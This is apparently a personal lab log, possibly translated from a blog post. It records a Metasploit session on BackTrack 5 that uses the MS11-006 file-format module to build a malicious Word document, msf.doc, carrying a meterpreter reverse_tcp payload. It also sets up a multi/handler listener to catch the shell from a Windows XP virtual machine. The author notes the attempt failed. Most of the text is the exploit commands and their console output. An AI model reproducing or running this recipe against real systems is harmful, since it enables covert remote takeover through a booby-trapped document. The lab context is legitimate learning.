Metasploit file-format vulnerability exploitation (successfully generated the doc)

Because BT5R3 failed, I have now switched to BT5R1.

msf > use windows/fileformat/ms11_006_createsizeddibsection
msf  exploit(ms11_006_createsizeddibsection) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf  exploit(ms11_006_createsizeddibsection) > set LHOST 192.168.1.11
LHOST => 192.168.1.11
msf  exploit(ms11_006_createsizeddibsection) > set LPORT 443
LPORT => 443
msf  exploit(ms11_006_createsizeddibsection) > set OUTPUTPATH /opt/framework/msf3/data/exploits/
OUTPUTPATH => /opt/framework/msf3/data/exploits/
msf  exploit(ms11_006_createsizeddibsection) > show options

Module options (exploit/windows/fileformat/ms11_006_createsizeddibsection):

   Name        Current Setting                     Required  Description
   ----        ---------------                     --------  -----------
   FILENAME    msf.doc                             yes       The file name.
   OUTPUTPATH  /opt/framework/msf3/data/exploits/  yes       The output path to use.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  seh              yes       Exit technique: seh, thread, process, none
   LHOST     192.168.1.11     yes       The listen address
   LPORT     443              yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf  exploit(ms11_006_createsizeddibsection) > exploit

[*] Creating 'msf.doc' file ...
[*] Generated output file /opt/framework/msf3/data/exploits/msf.doc
msf  exploit(ms11_006_createsizeddibsection) > 

msf.doc has been generated; copy this file into the XP virtual machine.

Then, in BT5, enter the following commands:

msf  exploit(ms11_006_createsizeddibsection) > use multi/handler
msf  exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf  exploit(handler) > set LHOST 192.168.1.11
LHOST => 192.168.1.11
msf  exploit(handler) > set LPORT 443
LPORT => 443
msf  exploit(handler) > exploit -j
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.11:443 
[*] Starting the payload handler...
msf  exploit(handler) > 

I opened msf.doc, but BT5 did not get a shell. Perhaps it is because the XP is not the English version. Tomorrow I will try an English XP.
